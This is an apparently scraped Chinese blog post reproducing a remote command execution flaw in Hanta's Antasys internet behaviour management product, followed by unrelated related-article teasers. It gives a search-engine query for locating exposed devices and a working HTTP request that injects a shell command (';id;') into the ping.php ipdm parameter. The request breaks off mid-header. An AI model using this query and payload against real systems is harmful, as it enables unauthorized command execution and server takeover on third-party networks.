汉塔上网行为管理 ping.php 远程命令执行漏洞复现(附脚本)

ops/2024/12/30 1:24:19/

0x01 产品描述:

        上海汉塔网络科技有限公司多年来一直专注于网络应用的软件开发,在网络安全、网络协议分析、网络数据流控制等领域有着丰富的经验和雄厚的技术实力。同时,公司积累了丰富的数据通信及网络安全产品研发、生产、销售及服务经验,是行业领先的新一代信息安全产品供应商,目前拥有上网行为管理、IPSecVPN、SSLVPN、流量控制等多款产品
0x02 漏洞描述:

        上海汉塔网络科技有限公司上网行为管理系统ping.php存在远程命令执行漏洞,未经授权的攻击者可利用该漏洞远程执行命令以获取服务器权限。
0x03 搜索语句:

body="Antasys"


0x04 漏洞复现:

GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
Host: your-ip
Priority: u=0, i
User-Agent: Mozilla/5.0 (Maci

http://www.ppmy.cn/ops/144754.html

相关文章

HTTP

目录 1.Http的基本代码 1.1 HttpServer.hpp 1.2 简单测试一下 1.3 用telnet测试一下 1.4 用浏览器访问 1.5 返回相应的过程(网页版本)​编辑 1.5.1 再次用浏览器访问 1.6 返回相应的过程(文件版本) 1.6.1网页 1.6.2 测试 …

学习ASP.NET Core的身份认证(基于JwtBearer的身份认证3)

根据参考文献1中JWT Token的组成及计算方式,对照参考文献2中的界面,实现简单的JWT Token解析及验证程序,主要功能包括:   1)拆分Token字符串,将前两段使用Base64UrlEncoder类解码并转为UTF8字符串&#x…

【Elasticsearch04】企业级日志分析系统ELK之Elasticsearch 插件

Elasticsearch 插件 通过使用各种插件可以实现对 ES 集群的状态监控, 数据访问, 管理配置等功能 ES集群状态: green 绿色状态:表示集群各节点运行正常,而且没有丢失任何数据,各主分片和副本分片都运行正常 yellow 黄色状态:表示由于某个节点宕机或者其…

spring boot的配置文件属性注入到类的静态属性

假设我们有一个名为some.property的属性,它在Spring配置文件中定义了值,例如application.properties或application.yml。 1. 非静态字段 为什么推荐? 简单直接:不需要额外的配置或复杂的逻辑。符合Spring的设计理念&#xff1a…

【工作流】工作顺序

背景 当时的情况是:没有产品经理,后端直接和需求方对接;前端只能短时间投入大部分时间要忙别的;只有3个角色:需求方,后端,前端; 当时直接执行的 直接使用会议了解需求&#xff0c…

async/await 代码实现

async/await和promise是什么关系? async/await基本语法是什么? await的执行机制是什么? 并发执行和串行执行 async/await底层是如何实现的? 模拟底层写一个简化版的代码 async/await和promise是什么关系? async/…

本科阶段最后一次竞赛Vlog——2024年智能车大赛智慧医疗组准备全过程——14Controller

本科阶段最后一次竞赛Vlog——2024年智能车大赛智慧医疗组准备全过程——14Controller ​ 本节给大家分享一下自己在比赛过程的控制思路,以及看到大佬们的思路 1 .定时器轮询版 ​ 在比赛的过程中,由于个人原因,时间有限只能想到一些比较简…

【开源免费】基于SpringBoot+Vue.JS靓车汽车销售网站(JAVA毕业设计)

本文项目编号 T 093 ,文末自助获取源码 \color{red}{T093,文末自助获取源码} T093,文末自助获取源码 目录 一、系统介绍二、数据库设计三、配套教程3.1 启动教程3.2 讲解视频3.3 二次开发教程 四、功能截图五、文案资料5.1 选题背景5.2 国内…